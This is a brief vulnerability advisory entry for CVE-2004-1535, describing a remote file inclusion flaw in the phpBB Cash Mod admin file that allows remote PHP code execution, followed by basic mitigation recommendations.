CVE-2004-1535

Name of the Vulnerable Software and Affected Versions phpBB Cash Mod module (affected versions not specified)

Description The issue allows remote attackers to execute arbitrary PHP code by modifying the phpbb root path parameter to reference a URL on a remote web server that contains the code. This is achieved through a remote file inclusion vulnerability in the admin cash.php file for the Cash Mod module.

Recommendations For the Cash Mod module, consider restricting access to the admin cash.php file until a patch is available. As a temporary workaround, avoid using the phpbb root path parameter to reference external URLs.